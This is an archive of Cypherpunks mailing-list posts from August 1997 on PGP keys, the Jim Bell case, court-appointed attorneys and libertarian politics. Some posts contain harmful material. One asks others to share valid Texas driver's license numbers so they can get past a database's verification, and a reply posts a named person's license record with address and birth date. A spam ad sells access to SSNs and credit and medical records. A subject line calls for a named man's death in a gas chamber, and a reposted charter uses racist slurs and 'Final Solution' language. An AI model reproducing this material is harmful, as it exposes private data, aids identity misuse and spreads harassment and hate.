: in return for digital cash small change!

It does :) Much better than lugging all these CDs around. Or vinyl for
that matter. We actually tried to get some mixing going with the BeOS
MP3 player (which has pitch control), but it needs some more work before
it's feasable :)

Cheerio,

alex


--
/// I dabble in techno-house and sometimes,
/// I do that badass hip-hop thang...
/// But the F U N K gets me every time!






From ppomes at Qualcomm.com  Wed Aug 20 06:05:22 1997
From: ppomes at Qualcomm.com (Paul Pomes)
Date: Wed, 20 Aug 1997 21:05:22 +0800
Subject: No Subject
Message-ID: <25904.872081322@zelkova.qualcomm.com>



>From: Brent Heustess 
>
>   This is a really spooky web site .  You can
>search 17 million Texas drivers by name, driver's license number or
>license plate number.  When you find a person, you can then find everyone
>at that address with a license.  You can even find everyone with the same
>9-digit zip code.  The record does not have a GIF of the photo, but it
>has everything else on the license.

The URL has changed to  and requires a valid
TX DL that is verified against the database.  Anyone care to post a few
for anonymous re-use?

/pbp






From jya at pipeline.com  Wed Aug 20 06:22:43 1997
From: jya at pipeline.com (John Young)
Date: Wed, 20 Aug 1997 21:22:43 +0800
Subject: e$: Cypherpunks Game: Terrorist Geodesic AP ZOG XXX-Teen NetFUD
Message-ID: <1.5.4.32.19970820130138.006e58ac@pop.pipeline.com>



WaJo 8-20-97:

High Tech 'n' Terrorists: Clancy Signs 24-Book Deal

New York - Best-selling author Tom Clancy signed a 
24-paperback deal with a division of Penguin Putnam Inc.
that is expected to be announced today, according to 
people close to the deal.

Berkley Publishing Group is paying an advance of 
approximately $22 million according to these people. 
The series, set in the near future, will include six 
adult and 18 juvenile novels.

Berkley will publish the series, "Tom Clancy's Netforce," 
over the next four to six years. In the books, the 
Internet and virtual reality have melded so that people 
spend most of their time on-line. The technology proves 
irresistible to terrorists and anticomputer zealots, who
are pursued by the Netforce.

The agreement comes on the heels of another deal Mr. 
Clancy recently made with Penguin, a unit of London media
company Pearson PLC. Pearson this month announced a 
long-term agreement with Red Storm Entertainment
Inc., a media-entertainment company founded by Mr. 
Clancy and Virtus Corp., an interactive-applications 
concern. Under that agreement, Penguin, along with
other Pearson subsidiaries, will join Red Storm to 
market multiplayer on-line games and other multimedia 
products.






From adejoode at replay.com  Wed Aug 20 07:15:51 1997
From: adejoode at replay.com (Alex de Joode)
Date: Wed, 20 Aug 1997 22:15:51 +0800
Subject: Alex le Heux
Message-ID: <199708201358.PAA05461@basement.replay.com>



Alex Le Heux sez:

: In article <199708181919.VAA19973 at xs2.xs4all.nl> you wrote:

: : Hey HEY!  It's the man who nearly managed to single-handedly 
: : derail the PGP legal export hack by playing the block rocking 
: : beats (all vinyl) which inspired the vacationing hackers to 
: : spill the drinks on the source books.

: What's a sourcecode book without a few drinks spilled on it? :)


Whatever happend to the sourcecode books ? :)

-AJ-






From jya at pipeline.com  Wed Aug 20 07:57:54 1997
From: jya at pipeline.com (John Young)
Date: Wed, 20 Aug 1997 22:57:54 +0800
Subject: Jim Belling the Bulls
Message-ID: <1.5.4.32.19970820143745.00712e08@pop.pipeline.com>



August 20, 1997

R.I. Passes Body Fluid Felony Law

PROVIDENCE, R.I. (AP) -- Inmates on the East Coast refer to it as
``serving'' a prison guard, while in the West it's called ``gassing.'' 

Guards know it simply as being splashed or smeared with urine or feces. 

``It's a badge of honor to serve an officer,'' said Richard Loud, president
of the Rhode Island Brotherhood of Correctional Officers. ``When an officer
gets served, the other inmates all cheer. They think it's a big joke.'' 

Rhode Island is among the states that have adopted laws to crack down on the
activity. A bill signed July 1 by Gov. Lincoln Almond makes throwing bodily
fluids or wastes a felony punishable by up to five more years behind bars
and a $5,000 fine. 

New York adopted a similar law last year, although, unlike the one in Rhode
Island, it didn't include saliva. 

``I think Rhode Island probably has one of the best laws in the country,''
said Stephen Chand, director of federal affairs for the Law Enforcement
Alliance of America. 

Rep. Gerald Solomon, R-N.Y., has sponsored federal legislation requiring
that inmates be tested for the AIDS virus if their bodily fluid or waste
touches a guard. 

Two such assaults occur a month at Rhode Island's state prison, Loud said
Tuesday. 

Some believe the punishment is excessive. 

``We think it is a harsh reaction to a non-issue,'' said Steve Brown,
executive director of the state chapter of the American Civil Liberties
Union. ``I think in most cases this will involve spitting. Inmates shouldn't
be spitting on guards, but certainly it doesn't merit a five-year prison
sentence.'' 

The act has been taking place for years in prisons, but such bills are
gaining strength because of the fear of AIDS. 

``The scientific and medical evidence is abundantly clear that it is
virtually impossible to get infected with the HIV virus through that sort of
conduct,'' Brown said. 

Prisons already can punish inmates by placing them in solitary confinement
or revoking other privileges, or can try them for misdemeanor assault, Brown
said. But authorities have had trouble prosecuting inmates under the
misdemeanor assault law, said Rep. Joseph McNamara, D-Warwick, the bill's
sponsor. 

``It's difficult to prove intent to do harm,'' McNamara said. 

However, he said, the fact that different slang terms exist for the act in
various parts of the country show how much a part of prison culture it is. 






From declan at pathfinder.com  Wed Aug 20 08:51:29 1997
From: declan at pathfinder.com (Declan McCullagh)
Date: Wed, 20 Aug 1997 23:51:29 +0800
Subject: Articles on Jim Bell and AP
In-Reply-To: 
Message-ID: 



Yep, you can find my Netly News article on Jim Bell at
http://netlynews.com/ -- search in the archives for Assassination.

I have a longer, 6-page, writeup of the Bell saga in last month's Internet
Underground magazine.

Back to my vacation...

-Declan




On Mon, 18 Aug 1997, Tim May wrote:
> As for info on Jim Bell, the article by Declan is widely available, and is
> quite informative. As for elaborating it further, or including more
> boilerplate, this seems pointless. Anyone knew to the story can read
> Declan's article. Anyone seeking even more information presumably knows how
> to use search engines and should be able to find the various essays and
> articles directly.






From dlv at bwalk.dm.com  Wed Aug 20 08:51:44 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 20 Aug 1997 23:51:44 +0800
Subject: Pedophile Chris Lewis deserves to die in a gas chamber
In-Reply-To: <25904.872081322@zelkova.qualcomm.com>
Message-ID: 



Paul Pomes  writes:

> >From: Brent Heustess 
> >
> >   This is a really spooky web site .  You can
> >search 17 million Texas drivers by name, driver's license number or
> >license plate number.  When you find a person, you can then find everyone
> >at that address with a license.  You can even find everyone with the same
> >9-digit zip code.  The record does not have a GIF of the photo, but it
> >has everything else on the license.
> 
> The URL has changed to  and requires a valid
> TX DL that is verified against the database.  Anyone care to post a few
> for anonymous re-use?
> 
> /pbp
> 


The Net.Scum pages for Peter and Stephanie Dasilva included the TX DL #'s
for both of them.

Paul Pomes is the scumbag who harrasses remailer operators, their upstreams
and employers, in an effort to shut down the remailers.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From amp at pobox.com  Wed Aug 20 08:54:43 1997
From: amp at pobox.com (amp at pobox.com)
Date: Wed, 20 Aug 1997 23:54:43 +0800
Subject: publicdata
In-Reply-To: <25904.872081322@zelkova.qualcomm.com>
Message-ID: 





> The URL has changed to  and requires a valid
> TX DL that is verified against the database.  Anyone care to post a few
> for anonymous re-use?
> 
> /pbp
> 


How about...


Name: BUSH,GEORGE HERBERT
License number: 000173204
Address:  9 S West Oak Dr
Date of birth: 6/12/24
City/Zip code:> HOUSTON 77056-2121
Gender: MaleRace: White
Height: 6.01
Weight: 190 pounds
Eye color: Gray
Hair: Brown
Last transaction date: 3/30/93
Last transaction: Renewal

------------------------
Name: amp
E-mail: amp at pobox.com
Date: 08/20/97
Time: 10:38:56
Visit me at http://www.pobox.com/~amp

'Drug Trafficking Offense' is the root passphrase to the Constitution.

Have you seen 
http://www.public-action.com/SkyWriter/WacoMuseum
------------------------






From phoenix at cutey.com  Wed Aug 20 09:10:19 1997
From: phoenix at cutey.com (Irwan Hadi)
Date: Thu, 21 Aug 1997 00:10:19 +0800
Subject: PGP5i supports RSA keys?
In-Reply-To: <19970817123643.13713.qmail@hotmail.com>
Message-ID: <3.0.3.32.19970820191650.04b68804@mail.bit.net.id>



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

At 05:36 17/08/97 PDT, David Downey wrote:
>Yes, PGP 5.0i does support the RSALIB. Even though you can generate 
>RSALIB based keys, why do so when there is a newer and better 
algorythm 
>supplied with the 5.0? Albiet it is nice to have the support as not 
>everyone has converted over, I still prefer the newer one. 4096 bit 
keys 
>are going to be rather hard to break in this lifetime. :-) 
but to generate and signing a message with 4096 bits key , will take 
much times, than with 2048 or 1024

>
>______________________________________________________
>Get Your Private, Free Email at http://www.hotmail.com
>
>
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBM/p9wlFJDOlka9UjEQJ9OACfWHOPXiv2uiGsoGi2wXjbRBwJA7IAoNLI
vpoeaqvnIPlJ24+7srQMFDTW
=yLCE
-----END PGP SIGNATURE-----






From fabrice at math.Princeton.EDU  Wed Aug 20 09:10:43 1997
From: fabrice at math.Princeton.EDU (Fabrice Planchon)
Date: Thu, 21 Aug 1997 00:10:43 +0800
Subject: Encrypted talk
In-Reply-To: <199708192358.SAA00652@crl5.crl.com>
Message-ID: <19970820115816.47995@math.princeton.edu>



On Tue, Aug 19, 1997 at 06:32:54PM -0700, Jeremey Barrett wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Jason Burrell writes:
>  > Does there happen to be a talk program out there that will allow more than
>  > two people to talk at once, and allow them to speak securely with strong
>  > cryptography, and will actually compile under Linux? 
>  > 
> 
> Barring the existence of such a thing, find a talk/talkd that does
> everything w/o the crypto, and tunnel it over ssh.

Unless ssh is already installed for all concerned parties, it's going to
be a royal pain. There is actually a pgptalk somewhere, based on ytalk,
which works quite well and should compile under linux. Don't remember
where I found it, but an archie search on pgptalk will tell you.

                      F.

-- 
Fabrice Planchon                                          (ph) 609/258-6495
Applied Math Program, 210 Fine Hall                      (fax) 609/258-1735








From phoenix at cutey.com  Wed Aug 20 09:11:54 1997
From: phoenix at cutey.com (Irwan Hadi)
Date: Thu, 21 Aug 1997 00:11:54 +0800
Subject: Which are stronger, the MPILIB, RSA or DSS
Message-ID: <3.0.3.32.19970820192406.04b68804@mail.bit.net.id>



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I just want to know which are stronger and securer the MPILIB, RSA or 
DSS.
Why the key which generated by MPILIB and DSS are much longer than 
which generated by RSA.
 
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBM/p/dlFJDOlka9UjEQLBdQCgnu94ZmgKLQ/yVuI89DZEqnAdu+QAoOXY
8a7CacSgAHzde8s7oD7cAFaB
=0ukC
-----END PGP SIGNATURE-----






From jamesd at echeque.com  Wed Aug 20 09:41:37 1997
From: jamesd at echeque.com (James A. Donald)
Date: Thu, 21 Aug 1997 00:41:37 +0800
Subject: FCPUNX:The Real Bell Issue / Re: Bell, etc
Message-ID: <199708201616.JAA11750@proxy4.ba.best.com>



At 11:21 AM 8/19/97 -0700, Tim May wrote:
> > So, I disagree with Duncan's apparent point that it's too bad the Bell case
> > didn't go to trial. I'm convinced Bell would have been convicted on most or
> > all charges. Hardly a test case for anything important.

At 05:56 PM 8/19/97 -0400, Duncan Frissell wrote:
> But the charges were minor stuff.  Under the Federal sentencing guidelines he 
> wouldn't have gotten much if convicted. 

Federal sentencing guidelines are irrelevant in political cases.  

For example the survivors of the Waco massacre were found guilty 
of trivial technicalities, and then sentenced as if they had been
found guilty of murdering federal agents.  All appeals have been
denied.

Indeed it appears to be standard practice, that if a political
criminal is charged with both trivial crimes of which he (and
everyone else) is guilty, and extremely serious crimes, of which
he is obviously innocent, he will be convicted on the trivia, and
sentenced on the accusations.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From tcmay at got.net  Wed Aug 20 09:55:47 1997
From: tcmay at got.net (Tim May)
Date: Thu, 21 Aug 1997 00:55:47 +0800
Subject: An end to "court appointed attorneys"
In-Reply-To: <199708200700.JAA25135@basement.replay.com>
Message-ID: 





First off, I don't believe _anyone_ should ever have a "court-appointed
attorney." We don't believe people should get state-subsidized food, or
shelter, or medical care, and so on....or at least most of us don't. So why
the big exception for hiring attorneys?

Second, nothing I have seen, and I've seen a lot, could've gotten McVeigh
off. While I can understand what his mental state may have been, and thus
can"understand" his motives, the facts are pretty clear that he did it.

It is conceivable that a "dream team" costing many millions of dollars, a
la Johnny Cockroach and the rest of the Simpson team, could have obfuscated
issues, confused a jury, etc., and gotten at least a mistrial (meaning:
more millions for them in Round Two).

But why should I pay for such a team? I paid too much for the Stephen
Jones/Jeralyn Merritt/etc. team as it was.

At 12:00 AM -0700 8/20/97, Anonymous wrote:

>  We have already seen the results of Tim McVeigh wanting his government
>schill replaced--a big FUCK YOU.
>  McVeigh's problem is not weakness, but lack of knowledge about the
>legal system and the quality of his legal representation. Unfortunately,
>I have no doubt that the government already has lawyers in place whose
>job thus far has been to gain McVeigh's trust, so that they can screw
>up his appeals, as well.

It's time to stop this "court appointed attorney" nonsense. If we as a
nation want to change our legal system to one where the court appoints both
sides of a case, prosecution and defense, as in many other countries, fine.
But it's absurd to finance the hiring of defense lawyers.

A better solution is to have relatively few things that are criminal, with
no laws against most of the things that now clog the courts. And short
trial, with none of the bullshit we saw in the Simpson case (or in any of
the other show trials of late). And no court appointed attorneys.

--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From patrick at atro.pine.nl  Wed Aug 20 10:42:51 1997
From: patrick at atro.pine.nl (Patrick Oonk)
Date: Thu, 21 Aug 1997 01:42:51 +0800
Subject: An end to "court appointed attorneys"
In-Reply-To: 
Message-ID: <199708201735.TAA08719@atro.pine.nl>



> First off, I don't believe _anyone_ should ever have a "court-appointed
> attorney." We don't believe people should get state-subsidized food, or
> shelter, or medical care, and so on....or at least most of us don't. So why
> the big exception for hiring attorneys?

Maybe for the simple reason that some people might not have the money to
defend themselves ?

-- 
| Patrick Oonk -    http://patrick.mypage.org/  - patrick at pine.nl |
| PGP Key ID 0xDA2E93FA   -   Internic PO59   -    |
| Pine Internet B.V.           Consultancy, installatie en beheer |
| Tel: +31-70-3111010 - Fax: +31-70-3111011 - http://www.pine.nl/ |






From tcmay at got.net  Wed Aug 20 10:55:29 1997
From: tcmay at got.net (Tim May)
Date: Thu, 21 Aug 1997 01:55:29 +0800
Subject: An end to "court appointed attorneys"
In-Reply-To: 
Message-ID: 



At 10:35 AM -0700 8/20/97, Patrick Oonk wrote:
>> First off, I don't believe _anyone_ should ever have a "court-appointed
>> attorney." We don't believe people should get state-subsidized food, or
>> shelter, or medical care, and so on....or at least most of us don't. So why
>> the big exception for hiring attorneys?
>
>Maybe for the simple reason that some people might not have the money to
>defend themselves ?

And what of those without the money to feed themselves? Etc.

I see no reason why an indigent McVeigh should be given a multimillion
dollar defense team (Jones et. al.)

You are, of course, welcome to pay for the defense of anyone, in the
Netherlands or here in the U.S. or wherever. Just don't expect me to.

--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From frissell at panix.com  Wed Aug 20 11:11:01 1997
From: frissell at panix.com (Duncan Frissell)
Date: Thu, 21 Aug 1997 02:11:01 +0800
Subject: The Real Bell Issue / Re: Bell, etc
In-Reply-To: <3.0.2.32.19970819175653.03657300@panix.com>
Message-ID: <3.0.2.32.19970820140006.0365b7a4@panix.com>



-----BEGIN PGP SIGNED MESSAGE-----

At 03:47 PM 8/19/97 -0700, Tim May wrote:

>My bigger fear, and no doubt Jim will someday read this and perhaps take
>umbrage at my comments here, is that this several-month "debriefing" period
>is where the Feds are collecting as much incriminating information against
>some of us as they can, perhaps with an eye toward hitting various of us
>with RICO charges, sedition, etc.

Though we aren't an organization.  If they couldn't win a sedition case 
against the isolationists during WWII or the White Separatists in Alabama(?) 
a few years ago, they won't be able to get us.  RICO also seems unlikely 
because of our disorganization and lack of overt actions.

>If I were to be arrested and held without bail--perhaps because of the
>"arms cache" and "chemicals" the news media would breathlessly report--I
>rather suspect my aggressiveness would fall on deaf ears.

Don't worry.  If you were busted it would cause a real stink.  Remember 
Operation Sun Devil.  The Feds really lost it.  Aggressiveness doesn't just 
mean publicity.  It means strategy at trial as well.  They have to try you 
and that would be risky for them because we all have an easy First Amendment 
argument to hammer them with.  The List is defined by its expression and not 
by anything else so attacks on the list are ipso facto attacks on expression.

In fact, Ruby Ridge and Waco are why the Feds are tiptoeing around any 
similar "raids."  The publicity there really hurt them.  Their trial losses 
in the insider trading cases of the 1980's (they lost all but one case that 
went to trial) are why such prosecutions dropped off.  They prefer cases they 
can win.

And note that the current SC is probably stronger on the 1st than any court 
in our history.  Tough row to hoe for prosecutors.  

DCF

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQCVAwUBM/swoYVO4r4sgSPhAQGCPAQAqsi0h6zgm8xfsvZhBzNb/uXDTB+CWjyj
yZk4USXIpBrESor7XPht14EKr3Ue+b2LWjoaH8kF5CocBUoDXhQ+9v6Fwcnwn9qE
k9EfFzLxiL05L1CUD6Ux8y3wKRt/TmX82CMTeBKiGDUGl3d+TLV8MnashZRkSXm4
+v89fjbrooU=
=s/PF
-----END PGP SIGNATURE-----






From qeumii at aol.com  Thu Aug 21 03:00:09 1997
From: qeumii at aol.com (INFOREVOLUTION)
Date: Thu, 21 Aug 1997 03:00:09 -0700 (PDT)
Subject: Find Info You Never Thought Possible..ONLINE!!
Message-ID: <199708213006BAA49657@buluxi.com.usa1.com>



Find The Dirt On The Internet!!

You will not receive any more correspondence from us!!!!!
-----------------------------------------------------------------------------

We have done the research for you!!! With this power tool you can access
information all over the World Wide Web about your employees, friends and
rivals. We give you the access to hundreds of sites that will supply you
with information about DMV records, credit profiles, medical and criminal
records, most anything you would want to know.

With this information you can track down phone numbers,social security
info, E-mail addresses, surnames, birth, marriage, divorce, and death records.
Look up a long, lost relative!!
With sites like Parent-Finder and Birth-Quest, look for biological parents!

Get a map of any place in the country.
Find out where speed traps are in your area, get info about legal issues,
Check out politics anywhere in the U.S.(access past congressional votes,
campaign finance, election results, etc.)

Most of these sites have links to other sites to allow you access to even
more information.You will be guided to thousands of pages all over the world!

The internet can be rather complicated. Take advantage of these simple, 
easy web sites containing tons of information. 

These are just a few items to look for, there are many, many MORE!
You can know EVERYTHING about EVERYBODY with this information!!
Your satisfaction is guaranteed, Just return the material within 30 days
for a full refund!

Send $11.95 to;  INFOREVOLUTION
                             875 Lawrenceville Suwanee Rd.,N.W.
                             Suite 310-314
                             Lawrenceville GA 30243-5484














  








From ppomes at Qualcomm.com  Wed Aug 20 12:12:53 1997
From: ppomes at Qualcomm.com (Paul Pomes)
Date: Thu, 21 Aug 1997 03:12:53 +0800
Subject: An end to "court appointed attorneys"
In-Reply-To: 
Message-ID: <25723.872103623@zelkova.qualcomm.com>



At 10:49 PDT on Wednesday, August 20, 1997, Tim May wrote:

|>Maybe for the simple reason that some people might not have the money to
|>defend themselves ?
|
|And what of those without the money to feed themselves? Etc.

The difference is that the lack of means to feed oneself is usually self-
selected.  Political criminals, or people simply unaware that they're felons
under an increasing number of laws, seldom have a choice whether they will
be arrested and tried.

Certainly the preferred solution is to junk most of the laws on the books.
However until committing a felony is an explicit conscious act, we will
need court-appointed attorneys for persecution victims.

/pbp






From tcmay at got.net  Wed Aug 20 12:21:33 1997
From: tcmay at got.net (Tim May)
Date: Thu, 21 Aug 1997 03:21:33 +0800
Subject: An end to "court appointed attorneys"
In-Reply-To: 
Message-ID: 



At 12:00 PM -0700 8/20/97, Paul Pomes wrote:
>At 10:49 PDT on Wednesday, August 20, 1997, Tim May wrote:
>
>|>Maybe for the simple reason that some people might not have the money to
>|>defend themselves ?
>|
>|And what of those without the money to feed themselves? Etc.
>
>The difference is that the lack of means to feed oneself is usually self-
>selected.  Political criminals, or people simply unaware that they're felons
>under an increasing number of laws, seldom have a choice whether they will
>be arrested and tried.
>
>Certainly the preferred solution is to junk most of the laws on the books.
>However until committing a felony is an explicit conscious act, we will
>need court-appointed attorneys for persecution victims.

I don't buy this. You are, of course, welcome to join Patrick Oonk in
funding lawyers for those unable (or unwilling) to pay. Demanding that I
pay for your charitable desires is, of course, theft.

As to your stipulation that this is for "political" cases, I of course
agree that there are too many laws. So? The fix is not to add fuel to the
engine of the beast by subsidizing a large infrastructure of "public
defenders" (really just taxpayer-funded "apprenticeships" for lawyers to
eventually enter private practice).

Why should those who managed to save money, for example, subsidize those
who did not? Jim Bell, for example (but not to pick on him...but he's the
current example), is almost as old as I am. And yet he made choices in his
career which left him indigent, or unable to pay for a legal defense. So
why should I and other taxpayers, including those working for $7 an hour at
Taco Bell, subsidize his lawyer-in-training?

Not that Bell's lawyer did any good....

--Tim May


There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From dlv at bwalk.dm.com  Wed Aug 20 13:24:55 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 21 Aug 1997 04:24:55 +0800
Subject: Tim May shows his true colors
Message-ID: <5N2qBe1w165w@bwalk.dm.com>



Path: altavista!news1.digital.com!su-news-hub1.bbnplanet.com!news.bbnplanet.co
xtewshub2.home.com!news.home.com!howland.erols.net!infeed2.internetmci.com!new
xted.internetmci.com!in3.uu.net!207.167.64.6!news.znet.com!tcmay.got.net!user
From: tcmay at got.net (Tim May)
Newsgroups: scruz.general
Subject: [CFV] Call for Discussion: "scruz.moderated"
Date: Sat, 09 Aug 1997 17:44:58 -0700
Organization: None
Lines: 94
Message-ID: 
NNTP-Posting-Host: 207.167.93.63
X-Newsreader: MT-NewsWatcher 2.3.1



There no longer being a proposal for discussion to create scruz.moderated,
in the form described in Glen's article, I am resurrecting my old
proposal. This proposal should not be confused with the other
"scruz.moderated" proposal.

This message has been automatically posted to this newsgroup because
scruz.moderated is now actively being discussed

Charter: Scruz.moderated is for educated and englightened discussion of
the pressing issues of Santa Cruz. It is to be a zone in which thoughtful
persons may discuss important issues with other thoughtful persons. The
moderator, Tim May, has already received indications of support from
leading conservative voices in Santa Cruz, including Carolyn Busenhart,
Tony S. Riducci, and Lee Himmelfarb (of the White People's Party). It will
be moderated by Tim May. 

Appropriate topics for scruz.moderated include:

- what to do with the homeless problem (e.g., the Final Solution)

- conversion of Lighthouse Field to a nuclear-powered whale packing plant
(based on the ideas of N. Campbell)

- revoking the charter of UCSC for its creation of the "Kikes and Dykes
Summer Program"

- moving the voting age in Santa Cruz back up to 21 to lessen the bias
caused by UCSC

- how to develop the North Coast, and plans to expand Highway One north of
Santa Cruz to 6 lanes--each way.

- getting the so-called health food stores shut down for failure to
properly irradiate their food

- which minorities should be relocated to Manzanar and other camps


And so on. Other topics may also be appropriate...check with the
moderator, Tim May, first.

Discussions of deviancy will not be tolerated, nor will leftist rants by
Vegans, tree worshippers, tree huggers, persons of color, and
self-described "queers."

The moderator, Tim May, will establish a "whitelist" of those with
automatic permission to post. All others will have to submit their posts
to moderator at whitepower.org. Those whose posts are approved 5 times in a
row will automatically be moved to the whitelist. The moderator, Tim May,
may move anyone off the whitelist anytime he chooses, and for any reason.

Those whose posts are approved will receive e-mail confirmation, saying
"That's mighty white of you."

With the help of the Santa Cruz community, a friendly and open space for
whites--to be known as "whitespace"--can be created. By screening out
disruptive and ideological bankrupt posts, your moderator can ensure that
meaningful debate takes place.


You must be a Registered NAWP Voter to participate in the survey. To
register, please fill out the New Voter Registration form at


Fill out the fields below using the information supplied to NAWP. Your
score must be between 0.0 (low) and 10.0 (high).

To be accepted by the email daemon, replies MUST be addressed to
 and have the word "CFV" in the SUBJECT line.

As an example, the BODY of your reply should look like this:

May:Adolph:1234:dsn:115:7.1.

--- Please Delete Down to Here in Your Reply ---

YourLastname:YourFirstname:YourPIN:dsn:115:YourScore.



Thank you.

--Tim May

-- 
There's something wrong when I'm a felon under an increasing number of laws.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From patrick at atro.pine.nl  Wed Aug 20 13:25:17 1997
From: patrick at atro.pine.nl (Patrick Oonk)
Date: Thu, 21 Aug 1997 04:25:17 +0800
Subject: An end to "court appointed attorneys"
In-Reply-To: 
Message-ID: <199708202016.WAA10456@atro.pine.nl>



> 
> 
> At 12:00 PM -0700 8/20/97, Paul Pomes wrote:
> >At 10:49 PDT on Wednesday, August 20, 1997, Tim May wrote:
> >
> >|>Maybe for the simple reason that some people might not have the money to
> >|>defend themselves ?
> >|
> >|And what of those without the money to feed themselves? Etc.
> >
> >The difference is that the lack of means to feed oneself is usually self-
> >selected.  Political criminals, or people simply unaware that they're felons
> >under an increasing number of laws, seldom have a choice whether they will
> >be arrested and tried.
> >
> >Certainly the preferred solution is to junk most of the laws on the books.
> >However until committing a felony is an explicit conscious act, we will
> >need court-appointed attorneys for persecution victims.
> 
> I don't buy this. You are, of course, welcome to join Patrick Oonk in
> funding lawyers for those unable (or unwilling) to pay. Demanding that I
> pay for your charitable desires is, of course, theft.

I am glad I live in the Netherlands, where there's at least of bit
of social consciousness left.


-- 
| Patrick Oonk -    http://patrick.mypage.org/  - patrick at pine.nl |
| PGP Key ID 0xDA2E93FA   -   Internic PO59   -    |
| Pine Internet B.V.           Consultancy, installatie en beheer |
| Tel: +31-70-3111010 - Fax: +31-70-3111011 - http://www.pine.nl/ |






From jim.burnes at ssds.com  Wed Aug 20 13:28:42 1997
From: jim.burnes at ssds.com (Jim Burnes)
Date: Thu, 21 Aug 1997 04:28:42 +0800
Subject: (Fwd) Release: Texas & Ruby Ridge killings (fwd)
Message-ID: 



------- Forwarded Message Follows -------
Date:          Tue, 19 Aug 97 14:36:32 PDT
From:          announce at lp.org
Subject:       Release: Texas & Ruby Ridge killings
Reply-to:      announce at lp.org
To:            announce at lp.org (Libertarian Party announcements)


-----BEGIN PGP SIGNED MESSAGE-----

===============================================
NEWS FROM THE LIBERTARIAN PARTY
2600 Virginia Avenue, NW, Suite 100
Washington DC 20037
===============================================
For release: August 19, 1997
===============================================
For additional information:
George Getz, Deputy Director of Communications
Phone: (202) 333-0008 Ext. 222
E-Mail: 76214.3676 at CompuServe.com
===============================================


Bring Marine and FBI killers to justice,
demands outraged Libertarian Party

        WASHINGTON, DC -- It's now legal for Marines to use
high-powered M-16 assault rifles to kill American high school students
and for FBI sharpshooters to gun down mothers holding their infant
daughters -- without worrying about any criminal penalties, the
Libertarian Party charged today.

        "In America today, your innocence is no guarantee that you
won't be killed by your own government," said the party's national
chairman, Steve Dasbach. "And incontrovertible proof of guilt is no
guarantee that military personnel or FBI agents will be charged with
any crime."

        Dasbach's comments were part of an outpouring of outrage that
followed the decision late last week by a grand jury in Texas not to
prosecute a Marine corporal who shot dead an 18-year-old high school
student, and by the Justice Department not to file charges against four
FBI agents involved in the killing of Vicki Weaver at Ruby Ridge,
Idaho, in 1992.

        "These two decisions show that the government is more concerned
about protecting the military and the FBI from justice than protecting
innocent civilians from death," charged Dasbach.

        The two cases -- while separated by five years and involving
different government agencies -- are graphic examples of why so many
Americans fear their government, said Dasbach.

        In Redford, Texas, Esequiel Hernandez, Jr. -- a "shy,
hard-working" young man, according to neighbors -- was gunned down by a
four-man squad of U.S. Marines in May as he grazed his herd of 45 goats
on his family's farm. He was the first American killed by U.S. soldiers
on U.S. soil as part of the War on Drugs.

        The grand jury ruled that the Marines were acting in
self-defense when they shot Hernandez -- despite overwhelming evidence
that the high school sophomore never saw the camouflaged Marines in the
first place.

        "This grand jury has sent a deadly message: Anything goes in
the War on Drugs," said Dasbach. "This so-called war has become a
military shooting war -- with M-16 assault rifles pointed directly at
American citizens."

        The grand jury's ruling caused a firestorm of criticism;
charges of a military cover-up; and demands for a Justice Department
investigation because of numerous inconsistencies in the "official"
version of the events.

        The military claims that Hernandez opened fire with his
antique .22 rifle on the four Marines, who were lurking in the scrub
brush while on a covert drug-surveillance mission.

        In response, they stalked Hernandez for several hundred yards,
and Marine Corporal Clemente Banuelos killed him with a single shot
from a high-powered M-16 assault rifle. According to Texas Rangers,
Hernandez was shot in the side, while facing away from the Marines.

        Hernandez lay bleeding -- his red blood pouring into the dusty
gray hillside near the Rio Grande River -- for 22 minutes before the
Marines called for emergency aid. The young victim had never been
suspected of or arrested for any criminal or drug-related activity.

        After the shooting, the Pentagon pulled 240 military personnel
